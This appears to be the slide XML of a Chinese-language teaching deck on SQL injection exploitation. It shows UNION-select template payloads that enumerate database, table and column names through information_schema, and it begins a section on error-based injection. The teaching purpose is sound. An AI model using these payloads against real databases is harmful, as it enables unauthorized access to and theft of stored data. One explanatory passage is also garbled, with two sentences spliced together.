                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774635" y="1215274"/>
            <a:ext cx="5008844" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>联合查询注入（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>union select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8422181-1A76-49EC-95FF-66ED3E48E1A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705372" y="1931523"/>
            <a:ext cx="7496847" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>username,password,xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> where id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC0D2E5E-462B-4623-9127-076EBD6409B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466507" y="2321581"/>
            <a:ext cx="3046547" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>爆数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="文本框 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDEEAB75-3008-4ED2-B892-F993936935C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503722" y="2800418"/>
            <a:ext cx="11641625" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=0 union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>											     from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="文本框 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86522897-3C7E-4370-9C01-DDBD4987D7F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466507" y="3917938"/>
            <a:ext cx="12889008" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=0 union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> 			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=database()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="文本框 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CE0771-801F-4917-8CDA-5EAF7F65BC14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466507" y="3493276"/>
            <a:ext cx="1287217" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>爆表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="文本框 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4085A5-1EFA-48EA-B83B-663BC9F83052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466507" y="5202374"/>
            <a:ext cx="12168039" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=0 union select 1,2,group_concat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>) from 					 			 			      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>=xxx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="文本框 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E05D9CB4-B27F-45BF-A756-CECD93F2D04A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="391775" y="4804625"/>
            <a:ext cx="1287217" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>爆列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4145583719"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485084" y="416902"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAAC0692-DAC5-41B7-9C4D-E8D83DFD7F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774635" y="1215274"/>
            <a:ext cx="5008844" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>报错注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F3CF56B-58C1-4505-87D7-4E2CD0C94ED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627327" y="2105390"/>
            <a:ext cx="10315769" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="SourceSansPro"/>
              </a:rPr>
              <a:t>报错注入是利用数据库的某些机制，人为的制造错误条件，使得查询结果能够出现在错误信息中</a:t>
            </a:r>
